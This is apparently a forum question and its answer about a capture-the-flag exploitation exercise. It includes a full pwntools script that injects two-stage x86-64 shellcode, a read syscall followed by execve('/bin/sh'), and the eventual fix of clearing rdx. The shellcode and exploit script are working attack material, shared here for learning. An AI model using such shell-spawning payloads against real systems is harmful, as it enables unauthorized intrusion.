Im have been doing a course on writting pwntools based exploits. While trying a challenge, after all my attemps I recieve the error "Got EOF while reading in iteractive". My shellcode in theory executes execve('/bin/sh') while debugging, but when I try it in the server I recieve that error. My shellcode is the following:
from pwn import *
context.terminal = ['tmux','splitw','-h']
if "REMOTE" not in args:
r = process("./multistage")
gdb.attach(r, """
b *0x040123f
c
si
si
si
si
si
si
si
si
si
""")
input("wait")
else:
r = remote("(serverdir)", 2003)
#FIRST CODE TO EXECUTE THE LATER SHELLCODE
# mov rsi,rax
# xor rax, rax
# xor rdi, rdi
# mov dl,0xff
# syscall
shellcode_aux = b"\x48\x89\xC6\x48\x31\xC0\x48\x31\xFF\xB2\xFF\x0F\x05"
r.send(shellcode_aux)
#ACTUAL SHELLCODE, since it is going to override the previous buffer, the order of instructions #will continue where the last buffer ended so we need to start our shellcode where the last one #left
# mov rdi,rsi
# xor rsi,rsi
# xor rdx,rdx
# add rdi,0x4
# mov rax,0x3b
# syscall
shellcode=b"\x48\x89\xC6\x48/bin/sh\x00\x00\x48\x89\xF7\x48\x31\xF6\x48\x31\xD2\x48\x83\xC7\x04\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"
r.send(shellcode)
r.interactive()
I dont want to leak the server ip, so i substituted it with "(serverdir)". As you can see I have to execute the shellcode in two stages because of the challenge. After the first shellcodeaux, I send a read syscall so I can execute the second shellcode. This second shellcode overwrittes the previous buffer, so I have to start the new code after the first one. I use the left over space where shellcode_aux was to store the direction /bin/sh. After debugging with pwndbg locally all seems to work fine, the syscall execve is executed with the correct direction ("/bin/sh"):
Continuing the debugging after that doesnt seem to give any problems, so I assumed everything worked fine, but when I try it on the actual server after sending the shellcode it gives me the "Got EOF while reading in iteractive". I would be very thankful for some help with the problem, Thank you.
I found out the problem (actually not me, somebody helped):
The first syscall I execute (in shellcode_aux) is a read, where the rdx register indicates the length that is going to be read. In my computer it is normally very low, so when I use the instruction mov dl,0xff although I only change the low part, the rdx register has a low value. In the server I execute it in the rdx value is pretty high, so only changing the low part leaves it still high and that leads to an error. I added an xor rdx,rdx to set it to zero before the mov dl,0xff and works.